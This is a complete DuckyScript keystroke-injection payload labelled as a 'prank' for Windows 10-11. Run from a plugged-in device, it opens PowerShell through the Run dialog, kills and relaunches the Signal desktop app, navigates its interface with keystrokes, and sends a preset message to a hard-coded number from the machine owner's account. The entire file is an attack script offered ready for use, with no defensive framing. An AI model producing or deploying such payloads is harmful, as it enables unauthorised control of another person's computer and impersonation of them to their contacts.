REM #########################################
REM #                                       |
REM # Title        : Send Signal Messages   |
REM # Author       : Aleff                  |
REM # Version      : 1.0                    |
REM # Category     : Prank, Execution       |
REM # Target       : Windows 10-11          |
REM #                                       |
REM #########################################

REM Requirements:
REM   - Internet Connection
REM   - Signal App installed
REM Payload Plug-And-Play but can be edited as you want the message

REM REQUIRED - Receiver number
DEFINE NUMBER 3332211000

REM REQUIRED - Message to send
DEFINE MESSAGE YOUR_MESSAGE

DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING Stop-Process -Name "Signal"
ENTER
STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
ENTER
DELAY 5000
TAB
TAB
TAB
ENTER
DELAY 100
STRING NUMBER
DELAY 100
TAB
DELAY 100
ENTER
DELAY 200

REM This is the message that will be sent.
REM You can change it as you want, if you want.
STRING YOUR_MESSAGE
ENTER

REM Closing Signal App
DELAY 500
ALT F4
